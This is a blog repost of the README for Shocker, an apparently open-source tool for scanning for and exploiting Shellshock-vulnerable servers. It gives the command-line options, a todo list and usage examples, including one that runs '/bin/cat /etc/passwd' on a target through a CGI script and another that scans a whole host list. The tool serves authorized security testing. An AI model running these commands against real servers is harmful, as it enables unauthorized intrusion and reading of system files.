James Eduard

James Eduard

  • Auditing Tool
  • Shell

    • Shocker – A tool to find and exploit servers vulnerable to Shellshock

    pir8g33k2 mins0

    Shocker is a tool to find and exploit servers vulnerable to Shellshock
    Released as open source by NCC Group Plc – https://www.nccgroup.trust/
    Developed By: Tom Watson, tom [dot] watson [at] nccgroup [dot] trust
    https://github.com/nccgroup/shocker
    Help Text
    usage:

    shocker.py
-h, --help show this help message and exit
--Host HOST, -H HOST A target hostname or IP address
--file FILE, -f FILE File containing a list of targets
--port PORT, -p PORT The target port number (default=80)
--exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a)
--cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
--proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
--ssl, -s Use SSL (default=False)
--threads THREADS, -t THREADS Maximum number of threads (default=10, max=100)
--verbose, -v Be verbose in output

    Usage Examples

    ./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi

    Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd

    ./shocker.py -H www.example.com -p 8001 -s

    Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit for any found

    ./shocker.py -f ./hostlist

    Scans all hosts listed in the file ./hostlist with the default options
    Dependencies
    Python 2.7+
    Todo:

    • Identify and respond correctly to HTTP/200 response – false positives – Low priority/hassle
    • Implement curses for *nix systems – For the whole application or only psuedo terminal? – Low priority/prettiness.
    • Thread the initial host check now that multiple targets are supported (and could be make this bit time consuming)
    • Change verbose to integer value – quiet, normal, verbose, debug?
    • Add option to skip initial host checks for the sake of speed?
    • Add a summary of results before exiting
    • Save results to a file? Format?
    • Eventually the idea is to include multiple possible vectors but currently only one is checked.
    • Add Windows and *nix colour support – Low priority/prettiness
    • Add a timeout in interactive mode for commands which don’t return, e.g. /bin/cat /dev/zero
    • Prettify – Low priority/pretinness (obviously)
    • Add support for scanning and explointing SSH and SMTP https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
    • Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Rober Picard
    • Other stuff. Probably.

     
    Download Shocker at Github

    pir8g33k

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    Related Articles

    2 mins
    You May Have Missed